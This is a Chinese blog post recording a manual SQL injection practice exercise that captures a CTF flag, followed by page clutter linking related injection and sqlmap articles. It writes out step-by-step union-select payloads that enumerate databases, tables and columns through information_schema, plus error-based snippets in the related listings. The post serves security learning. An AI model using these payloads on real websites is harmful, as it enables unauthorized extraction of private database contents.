sql手工注入练习拿flag

已于 2023-02-14 20:03:12 修改
阅读量2.4k 收藏 15
点赞数 1
分类专栏: web 文章标签: sql 数据库 mysql
于 2023-02-14 20:02:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/afanzcf/article/details/129018240
版权

sql手工注入练习拿flag

记录一下自己重新开始学习web安全之路⑤。

1、找注入点

①url ②搜索框 ③登录框

2、找交互点

1

用单引号判断是否存在交互点,发现回显不正常,说明url存在有交互点

3、判断类型(char类型)

利用and 1=1 和 and1=2,进行判断,当两次回显的页面是一样的,则说明是char类型

2

3

4、判断列数(order by)

4

输入语句?id=2’ order by 1#时,发现回显不正常。

这是因为注释符的原因,将注释符 # 改为 --+

5

利用二分法,判断列数为3列

5、查看回显位置(union 联合 select 查询)

6

?id=2’ and 1=2 union select 1,2,3–+

发现第二列,第三列有回显,第一列没有回显

6、查看数据库名称(message)

7

?id=2’ and 1=2 union select 1,database(),3–+

查询到数据库名称为message

7、查看数据表名称(flag、user,username)

8

?id=2’ and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘message’–+

8、查看数据列名称(flag,user,username)

9

?id=2’ and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = ‘message’ and table_name = ‘flag’–+

9、查看数据(flag,id)

10
?id=2’ and 1=2 union select 1,concat(id,‘—’,flag),3 from flag–+

Afanbird
关注
  • 1
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
centos云服务器安装cs(cobaltstrike4
2401_84253380的博客
04-26 297
wget https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz #下载jdk压缩包tar -zxvf jdk-8u201-linux-x64.tar.gz #解压解压完之后生成一个jdk1.8.0_201文件mv jdk1.8.0_201 /usr/local/jdk1.8/ #把jdk1.8.0_201文件移动到usr/local/jdk1.8/目录下配置环境变量。
SQL简单注入
weixin_44300286的博客
07-20 696
题目来源:https://www.ichunqiu.com/battalion 一、SQL 题目描述: 出题人就告诉你这是个注入,有种别走! 查看网页源码,发现源码中有select语句的信息,这下我们省事了。 根据源码可看出,注入点无闭合符号,我们先构造payload: id=1 --+ 发现页面正常显示,那么我们的猜想是正确的。 第一步判断字段数,输入: id=1 order by 1 ...
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1304
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
sql常见注入方法3种】--靶场lovesql
m0_63241485的博客
09-02 1536
sqlmap使用,手动sql注入,其他sql注入工具使用
sqlmap详解及实战拿flag
weixin_43996007的博客
12-19 4523
sqlmap详解及实战拿flag 一、sqlmap介绍 sqlmap是一个非常强大的自动化SQL注入工具,其主要功能是扫描,发现并利用SQL注入漏洞。sqlmap工具支持多种sql注入技术,它们分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3)基于报...
利用sqlmap注入获取flag
weixin_43910033的博客
01-21 4518
准备注入网址:http://192.168.129.129:8079 (需要自己搭建) 注入点:id 1.注入语句: python sqlmap.py -u "http://192.168.129.129:8079/?id=1" 2.得到数据库MySQL,进一步获取数据库信息。 python sqlmap.py -u "http://192.168.129.129:8079/?id=1" --dbs 3.得到可用的数据库,查询数据库里面的表以获取表信息 python sqlmap.py -u "
使用sqlmap + burpsuite sql工具注入拿flag
太阳照耀我走四方
02-13 1688
简单的渗透工具sqlmap使用
CTF夺旗-sql注入(get)
qq_43776408的博客
03-10 796
1. 结果 2. -T4最快速度扫描 -A 加载所有模块 -v 以一种尽可能详细的方式显示 3. 上张图片的黄色的部分,就是目标的网站的登录页面 你可以在历览器中访问这个页面 4. 这个软件是kali自带的 5. 5. ...
SQL注入实战第一个flag
qq_41904330的博客
08-04 6114
SQL注入实战: 登陆的是墨者平台的这个SQL实战 登陆进去后我们进行用burp进行抓包: 进行抓包获取后发送到重新器中: 看到当order by为5的时候报错了说明字段数少于5那么试一下order by 4# 发现order by 4# 没有报错说明字段数为4 我们检测一下输入的点用 select 1,2,3,4#来检测一下都在什么位置 我们来查看数据库名称:查出来为mozhe_di...
Flag
niaonao
04-08 679
顽张って
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
sql注入手工注入示例详解
09-10
手工注入是指不依赖自动化工具,而是通过手动构造和尝试不同的SQL语句来探测和利用这种漏洞。本文将深入讲解如何进行手工SQL注入,以帮助读者理解和掌握这个过程。 首先,我们需要识别注入点,即用户输入能够影响到...
SQL手工注入完全篇
09-08
SQL手工注入是网络安全领域中的一个重要话题,主要涉及的是利用数据库查询语句的漏洞来非法获取或篡改数据库信息。在本完全篇中,我们将深入探讨SQL注入的基本原理、常见手法、防范措施以及如何进行安全编码。 一、...
SQL 手工注入 变形上传拿shell
10-21
SQL 手工注入 变形上传拿shell 上传分析
sql注入练习工具
11-08
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据,导致恶意SQL代码被插入到数据库查询中。这种攻击方式可以让攻击者获取、修改、删除数据库中的敏感信息,甚至完全控制数据库...
zzcms sql注入分析
课嗨教育的专栏
10-26 502
action=="del" 下面应用sql语句不存在任何过滤,被直接带入到了query中执行。
sql注入(基础)题解
agoodboy6的博客
11-04 252
上述语句的结构,可以将information-schema.schemata/tables/columns看作所要查询的范围,而where后的语句作为上一步语句查询获取的信息又使得此步查询更加准确。原理:在SQL注入攻击过程中,服务器开启了错误回显,页面会返回错误信息,利用报错函数获取数据库数据。select * from member where id='$id' 字符型sql语句。初次尝试,发现显示结果不全,推测此题对回显长度有限制。table-name与table-name呼应。
SQL注入(上)
2401_82388450的博客
03-26 760
and (select 1 from (select count(*),concat((select 查询的内容 from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) --+and updatexml(1,concat('^',(需要查询的内容),'^'),1)
sql手工注入 union
09-17
SQL手工注入是一种攻击技术,通过修改SQL查询语句来绕过应用程序的安全措施,并获取未授权的数据。其中,union查询是一种常用的手工注入技巧之一。通过使用union关键字,可以将两个或多个查询的结果合并在一起返回。 具体地说,当应用程序存在SQL注入漏洞时,攻击者可以构造一个恶意的union查询来获取额外的信息。首先,攻击者需要确定目标查询中的字段数量。可以通过使用order by语句来猜测字段数量,直到页面回显异常为止。一旦确定字段数量,攻击者就可以使用union select语句将自己的查询结果与目标查询结果合并在一起返回,从而获取未授权的数据。 例如,假设目标查询为:select id, name, email from users,攻击者可以构造以下恶意的union查询进行注入攻击:union select 1, 'attacker', 'attacker@example.com'。这样,攻击者就可以将自己的数据添加到目标查询结果中。 请注意,SQL注入是一种严重的安全威胁,应该始终采取适当的安全措施来防止它的发生,例如使用预编译语句或参数化查询。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值